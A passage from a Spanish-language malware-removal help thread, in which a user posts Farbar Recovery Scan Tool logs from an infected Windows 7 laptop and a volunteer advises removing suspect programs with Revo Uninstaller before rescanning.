HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => El servicio de Firewall de Windows no se está ejecutando.
MpsSvc => El servicio de Firewall de Windows no se está ejecutando.

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AIPS => 2
MSCONFIG\Services: BstHdAndroidSvc => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: BstHdPlusAndroidSvc => 3
MSCONFIG\Services: CG6Service => 2
MSCONFIG\Services: CGVPNCliService => 2
MSCONFIG\Services: ExpressVPNService => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Http_analyzer_v7_netfilter => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: WinDefend => 2
MSCONFIG\Services: ZenMate5Service => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DishAnywherePlayerShortcut.lnk => C:\Windows\pss\DishAnywherePlayerShortcut.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Recorte de pantalla y Selector de OneNote 2010.lnk => C:\Windows\pss\Recorte de pantalla y Selector de OneNote 2010.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Samsung Auto Backup Guage.lnk => C:\Windows\pss\Samsung Auto Backup Guage.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CCleaner Smart Cleaning => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: EgisTecLiveUpdate => "C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe"
MSCONFIG\startupreg: ExpressVPNNotificationService => "C:\Program Files (x86)\ExpressVPN\expressvpn-ui\ExpressVPNNotificationServiceStarter.exe"
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpqSRMon => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe
MSCONFIG\startupreg: IDMan => C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
MSCONFIG\startupreg: movavi_videoconverter_agent => "C:\Users\MARCO AVILA\AppData\Roaming\Movavi Video Converter 19 Premium\ConverterAgent.exe"
MSCONFIG\startupreg: mwlDaemon => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
MSCONFIG\startupreg: PDF7 Registry Controller => C:\Program Files (x86)\Nuance\PDF Professional 7\RegistryController.exe
MSCONFIG\startupreg: PDFHook => C:\Program Files (x86)\Nuance\PDF Professional 7\pdfpro7hook.exe
MSCONFIG\startupreg: PDVD8LanguageShortcut => "c:\Program Files (x86)\CyberLink\PowerDVD8\Language\Language.exe"
MSCONFIG\startupreg: PWRISOVM.EXE => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RemoteControl8 => "c:\Program Files (x86)\CyberLink\PowerDVD8\PDVD8Serv.exe"
MSCONFIG\startupreg: SmileboxTray => "C:\Users\MARCO AVILA\AppData\Roaming\Smilebox\SmileboxTray.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: UVS10 Preload => C:\Program Files (x86)\Ulead Systems\Ulead VideoStudio SE DVD\uvPL.exe

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [TCP Query User{366F23B0-A93E-4D27-B27D-4C35A39332F0}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{773046CB-4887-40F8-98FF-F54E014350F5}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [TCP Query User{AF830F9F-477D-4255-97FE-0EF0EE55F200}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{C917BBB9-BA08-4078-8791-8322937FFD69}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{82E9CFC6-B7F1-4B31-BE71-99752572EEDA}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{79697472-7464-49E5-9290-00A065F43C82}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E9602492-F37B-4240-89B7-0C70ADE2AA71}] => (Allow) LPort=2869
FirewallRules: [{CFA1B78C-0293-4EC5-83D9-62BEDDB4D8B1}] => (Allow) LPort=1900
FirewallRules: [{67173E6A-BAA6-439D-AB77-C2FE749C1E33}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{BFE4D6F8-9081-4A1C-9456-3D756F608CED}] => (Allow) LPort=2869
FirewallRules: [{D43C1EF5-D2E0-475D-8975-343493D398E5}] => (Allow) LPort=1900
FirewallRules: [{26F2DF09-DEDA-4C43-8887-69F78A6F9CB0}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{0A9103B6-E567-48CD-ABA1-3EB2A1C6A7AB}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{204D78B9-4BE4-417F-AB44-1EFB9AB5F18E}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [{F27355F9-E64C-42A5-8A0E-CEB5F9244A6F}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe (Hewlett-Packard Company -> Hewlett-Packard)
FirewallRules: [{547421D3-D7AA-491A-9433-45EFB8C8A9C2}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CBF6769F-1DE4-4E7C-8354-72141872CBFF}] => (Allow) LPort=1542
FirewallRules: [{3A8FA1B7-0C8D-4CBD-9DF7-CDFA95A258FE}] => (Allow) LPort=1542
FirewallRules: [{2D4648E6-3E13-4A06-B05F-FC1576F10700}] => (Allow) LPort=53
FirewallRules: [{4513D140-DC13-4D7D-A936-C1D35415CD84}] => (Allow) LPort=1542
FirewallRules: [{327D53F6-CA13-48CE-B0B3-467850291634}] => (Allow) LPort=1542
FirewallRules: [{E8584AE4-943A-4762-AE3C-8600F07B0540}] => (Allow) LPort=53
FirewallRules: [{3B898225-EBA1-4B29-83E8-3344D84E1C64}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{95BDBC3E-EA4E-4D1A-B014-314290E4C259}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{CFC593AB-A208-4022-A242-A49F41139E65}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{5CF3FFBD-64A8-48B9-A708-3E45719BDF50}] => (Allow) LPort=1688
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\FlashGet Network\FlashGet 3\FlashGet3.exe] => Enabled:Flashget3

==================== Puntos de Restauración =========================

24-03-2020 21:39:38 Punto de control programado
25-03-2020 00:28:25 Operación de restauración
25-03-2020 14:28:58 Windows Update
25-03-2020 18:15:54 Removed Jaksta Streaming Media Recorder

==================== Dispositivos defectuosos en el Administrador de dispositivos ============

Name: Synaptics PS/2 Port TouchPad
Description: Synaptics PS/2 Port TouchPad
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Synaptics
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: ExpressVPN TAP Adapter
Description: ExpressVPN TAP Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: ExpressVPN
Service: tapexpressvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (03/26/2020 01:39:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: cloudnet.exe, versión: 7.2.1.1, marca de tiempo: 0x5e7ae7f7
Nombre del módulo con errores: SHLWAPI.dll, versión: 6.1.7601.17514, marca de tiempo: 0x4ce7b9e2
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0003e0be
Id. del proceso con errores: 0x1810
Hora de inicio de la aplicación con errores: 0x01d603a6401e55b3
Ruta de acceso de la aplicación con errores: C:\Users\MARCO AVILA\AppData\Local\Temp\csrss\cloudnet.exe
Ruta de acceso del módulo con errores: C:\Windows\syswow64\SHLWAPI.dll
Id. del informe: 7f67c017-6f99-11ea-88a6-00262d6f27b2

Error: (03/26/2020 12:18:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0x528
Hora de inicio de la aplicación con errores: 0x01d6039ae9497479
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: 3490774f-6f8e-11ea-88a6-00262d6f27b2

Error: (03/26/2020 12:18:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Nombre del módulo con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x00004fa9
Id. del proceso con errores: 0x7f0
Hora de inicio de la aplicación con errores: 0x01d6039ac2961492
Ruta de acceso de la aplicación con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Ruta de acceso del módulo con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Id. del informe: 333af46f-6f8e-11ea-88a6-00262d6f27b2

Error: (03/26/2020 12:17:14 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\MARCO AVILA\AppData\Local\chromium\Application\chrome.exe".
No se encontró el ensamblado dependiente 58.0.2988.0,language="&#x2a;",type="win32",version="58.0.2988.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (03/26/2020 11:42:11 AM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows no puede tener acceso al archivo  por alguna de las siguientes razones:
Hay un problema con la conexión de red, con el disco donde se almacena este archivo o con los controladores
de almacenamiento instalados en este equipo; o bien no se encuentra el disco.
Windows cerró el programa Inicialización de seguridad por este error.

Programa: Inicialización de seguridad
Archivo: 

El valor del error se muestra en la sección Datos adicionales.
Acción del usuario
1. Abra el archivo de nuevo.
Podría ser sólo un problema temporal que se corrige al ejecutar el programa de nuevo.
2.
Si todavía no se puede tener acceso al archivo y 
	- Está en la red,
el administrador de red debe comprobar que no exista ningún problema con la red y que es posible ponerse en contacto con el servidor.
	- Está en un disco extraíble, como un disquete o un CD-ROM, compruebe que el disco esté insertado en el equipo.
3. Compruebe y repare el sistema de archivos ejecutando CHKDSK. Para ejecutar CHKDSK, haga clic en Inicio y después en Ejecutar; escriba CMD y después haga clic en Aceptar. En el símbolo del sistema, escriba CHKDSK /F y después presione Entrar.
4. Si el problema continúa, restaure el archivo a partir de una copia de seguridad.
5. Compruebe si se pueden abrir otros archivos en el mismo disco. Si no se pueden abrir, el disco podría estar dañado. Si se trata de un disco duro, póngase en contacto con el administrador o con el fabricante del hardware del equipo
para obtener ayuda adicional.

Datos adicionales
Valor del error:00000000
Tipo de disco: 0

Error: (03/26/2020 11:42:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: secinit.exe, versión: 6.1.7600.16385, marca de tiempo: 0x4a5bc1b6
Nombre del módulo con errores: unknown, versión: 0.0.0.0, marca de tiempo: 0x00000000
Código de excepción: 0xc0000096
Desplazamiento de errores: 0x005130b9
Id. del proceso con errores: 0x9c4
Hora de inicio de la aplicación con errores: 0x01d60395bcf1d029
Ruta de acceso de la aplicación con errores: C:\Windows\SysWOW64\secinit.exe
Ruta de acceso del módulo con errores: unknown
Id. del informe: 1e84d5d2-6f89-11ea-8c3f-00262d6f27b2

Error: (03/26/2020 11:41:28 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa MouliaLeFil.tmp, versión 51.52.0.0, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

Identificador de proceso: 10a4

Hora de inicio: 01d60395ab816991

Hora de finalización: 31

Ruta de acceso de la aplicación: C:\Users\MARCOA~1\AppData\Local\Temp\is-CRPMB.tmp\MouliaLeFil.tmp

Identificador de informe:

Error: (03/26/2020 11:39:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: ergfeefvg.exe, versión: 0.0.0.0, marca de tiempo: 0x5e6f537f
Nombre del módulo con errores: KERNELBASE.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99884
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000e024
Id. del proceso con errores: 0x15a8
Hora de inicio de la aplicación con errores: 0x01d6039581a2a5b8
Ruta de acceso de la aplicación con errores: C:\Users\MARCO AVILA\AppData\Roaming\ergfeefvg.exe
Ruta de acceso del módulo con errores: C:\Windows\syswow64\KERNELBASE.dll
Id. del informe: cfae3943-6f88-11ea-8c3f-00262d6f27b2


Errores del sistema:
=============
Error: (03/26/2020 12:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 12:21:08 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 12:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 12:21:08 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 12:21:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mdf15 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 12:21:06 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 12:21:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mdf15 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 12:21:04 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.


==================== Información de la memoria =========================== 

BIOS: INSYDE V1.30 09/29/2009
Placa base: Acer Aspire 4810T
Procesador: Genuine Intel(R) CPU U4100 @ 1.30GHz
Porcentaje de memoria en uso: 89%
RAM física total: 3003.79 MB
RAM física disponible: 304.13 MB
Virtual total: 7478.1 MB
Virtual disponible: 1557.25 MB

==================== Unidades ================================

Drive c: (ACER) (Fixed) (Total:453.94 GB) (Free:90.62 GB) NTFS

\\?\Volume{5e7a9bc6-de7f-11de-9b61-806e6f6e6963}\ (SYSTEM RESERVED) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5e7a9bc5-de7f-11de-9b61-806e6f6e6963}\ (PQSERVICE) (Fixed) (Total:11.72 GB) (Free:1.48 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BC3BBC3B)
Partition 1: (Not Active) - (Size=11.7 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453.9 GB) - (Type=07 NTFS)

==================== Final de Addition.txt =======================

Saludos!

JavierHF · 26 Marzo, 2020 21:46

Bien… pues ahora haces lo siguiente, descarga e instala este programa Manual de Revo Uninstaller

Y úsalo para desinstalar todos los programas que encuentres que se llamen o tengan en su nombre, cualquiera de estas denominaciones :

Cuando Revo te pida, que selecciones el método de desinstalación, seleccionas “Avanzado”.

Si durante el proceso te solicita “Reiniciar” NO lo hagas, dile que NO y deja que Revo siga trabajando.

Cuando termines todos los procesos de desinstalación ya REINICIAS tú el ordenador.

Compruebas SI te deja usar Malwarebytes y nos comentas.

Saludos.

Marco · 26 Marzo, 2020 23:01

Estaba realizado el procedimiento que me indicaste con Revo pero se queda en la parte donde se intenta desinstalar el programa debido a que me aparece la ventana en color negro que te comentaba en mi primer mensaje en la cual no se tiene la opción de desinstalar ni hacer nada mas.

JavierHF · 26 Marzo, 2020 23:05

Correcto…lo que debes hacer es picar un par de veces dentro de la ventan negra y ver si ocurre algo y de NO ocurrir nada o no dejarte NI siquiera escribir la cierras con el ASPA(X) y luego dejas o sigues los pasos que te ira dando RevoUninstaller.

Saludos.

Marco · 27 Marzo, 2020 00:01

Pude terminar el procedimiento de Revo siguiendo las recomendaciones de tu ultimo mensaje, de igual manera revise si podía abrir Malwarebytes pero aún no me deja ni en modo normal ni en modo seguro.

JavierHF · 27 Marzo, 2020 00:33

Bien… pasa de nuevo FRST y nos pones informes frescos… lleva cuidado al pegar los informes porque los últimos que pusiste tenían bastantes descuadres en las lineas.

Saludos.

Marco · 27 Marzo, 2020 01:26

Aquí están los nuevos informes.

Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (administrador) sobre MAAH-PC (Acer Aspire 4810T) (26-03-2020 18:49:13)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Perfiles cargados: MARCO AVILA (Perfiles disponibles: MARCO AVILA & Administrador)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: FF)
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

( ) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-LRH00.tmp\MouliaLeFil.exe
() [Archivo no firmado] C:\ProgramData\CloudPrinter\CloudPrinter.exe
() [Archivo no firmado] C:\ProgramData\Logic Cramble\set.exe
() [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-OCJQN.tmp\MouliaLeFil.tmp
() [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Helper.exe
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\rss\csrss.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Optical Drive Power Management\ODDPWR.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe
(Acer Incorporated -> Acer) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Acer Incorporated) [Archivo no firmado] C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Acer Incorporated) [Archivo no firmado] C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acresso Software Inc. -> Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Clarus, Inc.) [Archivo no firmado] C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFRealTimeD.exe
(Clarus, Inc.) [Archivo no firmado] C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFTimerD.exe
(Dritek System Inc. -> Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Dritek System Inc. -> Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(EGIS TECHNOLOGY INC. -> Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(EpicNet Inc.) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
(Fine Point Technologies, Inc.) [Archivo no firmado] C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe
(Ggmyhirjho) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe
(Hewlett-Packard Company -> Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exe
(InstallShield Software Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\attrib.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\secinit.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Rfz) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(Softdeluxe Ltd. -> FreeDownloadManager.org) C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Ulead Systems, Inc.) [Archivo no firmado] C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation -> Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8060960 2009-08-05] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [PLFSetI] => C:\Windows\PLFSetI.exe [200704 2009-12-01] () [Archivo no firmado]
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2009-10-02] (Acer Incorporated -> Acer Incorporated)
HKLM\...\Run: [ODDPwr] => C:\Program Files\Acer\Optical Drive Power Management\ODDPwr.exe [221728 2009-09-04] (Acer Incorporated -> Acer Incorporated)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [159232 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [380928 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [358912 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1808168 2009-06-18] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-09-24] (NewTech Infosystems, Inc -> NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [1094736 2009-11-01] (Dritek System Inc. -> Dritek System Inc.)
